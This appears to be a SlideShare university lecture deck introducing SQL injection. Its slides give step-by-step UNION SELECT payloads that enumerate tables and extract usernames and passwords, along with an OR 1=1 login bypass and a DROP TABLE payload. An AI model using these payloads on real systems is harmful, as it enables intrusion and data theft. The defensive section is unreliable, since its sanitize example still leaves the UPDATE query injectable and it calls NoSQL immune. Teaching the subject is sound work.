A Brief Introduction in SQL Injection


Published on

Published in: Education
1 Like
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide
  • Tables have relation with each other . Inserting the row in tables with unauthorized access
  • A Brief Introduction in SQL Injection

    1. 1. Security Lab, University Putra Malaysia23 May 2013Sina ManaviContact:http://sinamanavi.blogspot.com/p/about-me.html
    2. 2. • Introduction• Why SQL Injection• What is needed for this• What you can do with SQL Injection• What are its pros and cons• Why we need to know and how we can prevent ourdatabase from SQL injection attacks
    3. 3. We are all familiar with SQL LanguageOne of the technology that helped in converting the staticweb to dynamic oneSQL is relatively easy to read, a little more difficult to writeWorks on Servers such as Apache, MS Server, etc.SQL Injection means manipulate SQL tables withunauthorized access
    4. 4.  SQL Injection may happen only two form of UIbased or URL based◦ (1) Injecting into a form. Such as username andpassword boxes on a login page.◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php?pid=10
    5. 5.  Simple example: Select ID from tbl_users◦ Where ID=“Uid” and pass=“pass”◦ If it returns any value means that the current inputs are correct
    6. 6.  www.yourtarget.com/list?id=5 if you want to view a record from a table by theURL based injection:Select * from tbl_usersWhere id=5
    7. 7.  The "INFORMATION_SCHEMA" holds the namesof every table and column on a site, its name willnever change.◦ Tables holding all the tables name: "INFORMATION_SCHEMA.TABLES.“◦ Tables holding all the Column name: "INFORMATION_SCHEMA.COLUMNS.“
    8. 8.  Finding the URL quantity:◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1--Increase the 1 , until you got error, then the last number is the columnnumber Finding Table name◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--And it shows:tbl_userTo Be continued 
    9. 9.  Now its time to find out the Column names:www.yourtarget.com/list.php? ID =-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=‘tbl_user-- The result would be as following :id,username,passwordColumn names finding step:www.yourtarget.com/list.php? ID =-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=UserAccounts+AND+column_name>displayed_column—Try the columns name until you find your target (e.g username,password, or login)
    10. 10.  And Finally its time to see the records:◦ www.yourtarget.com/list.php? =-1+UNION+SELECT+1,username,3+FROM+UserAccounts— And◦ www.yourtarget.com/list.php? =-1+UNION+SELECT+1,password,3+FROM+UserAccounts—◦ Username=admin password=123456◦ Stupid admin ha ;) 
    11. 11.  Now we can Alter the records as well, lets rockUPDATE tbl_userSET password = SHA2($password)WHERE id = $idOr we can Insert a new user with Insert Command
    12. 12. If user_list contains 1000 records then, the database isfired up SELECT * FROM user_list JOIN user_listJOIN user_list JOIN user_list JOIN user_listJOIN user_list
    13. 13. Insert newuser into tbl_userThe maliciouse code can be :DROP table tbl_user
    14. 14.  How it worksSelect * from tbl_usersWhere id=“Fname” and pass=“pass” Malicious Code:SELECT * FROM table WHERE id= ‘Fname or 1=1;if(mysql_num_rows($result))//do loginNow the unauthorized user get accessed easily andbypassed the authorization
    15. 15.  Security is the developer’s job No database, connector, or frameworkcan prevent SQL injection all the time
    16. 16. • Implement proper Error Handling. This would includeusing a single error message for all errors.• Lock down User Database configuration, Specify users,roles and permissions etc.• prefix and append a quote to all user input, even if thedata is numeric .
    17. 17. <?phpfunction sanitize($string){$string = strip_tags($string);$string = htmlspecialchars($string);$string = trim(rtrim(ltrim($string)));$string = mysql_real_escape_string($string);return $string;}$password = sanitize( $_POST["password"] );mysql_query("UPDATE UsersSET password = $passwordWHERE user_id = $user_id");
    18. 18. Vipin Samar, Oracle vice president of DatabaseSecurity:“Database Firewall is a good first layer ofdefense for databases but it wont protect you fromeverything,”
    19. 19.  Using Stroprocedures:CREATE PROCEDURE SP_show_user(IN U_ID)BEGINSELECT * FROM Bugs WHERE User_ID= U_ID;ENDCALL SP_show_user (54)“Might be helpful but still vulnerable”
    20. 20.  I don’t have to worry anymore Escaping is the fixthe fix More escaping is better I can code an escaping function Only user input is unsafe Stored procs are the fixthe fix SQL privileges are the fixthe fix My app doesn’t need security Frameworks are the fixthe fix Parameters quote for you Parameters are the fixthe fix Parameters make queries slow SQL proxies are the fixthe fix NoSQL databases are the fixthe fix
    21. 21. NoSQL databases are immune to SQL injection.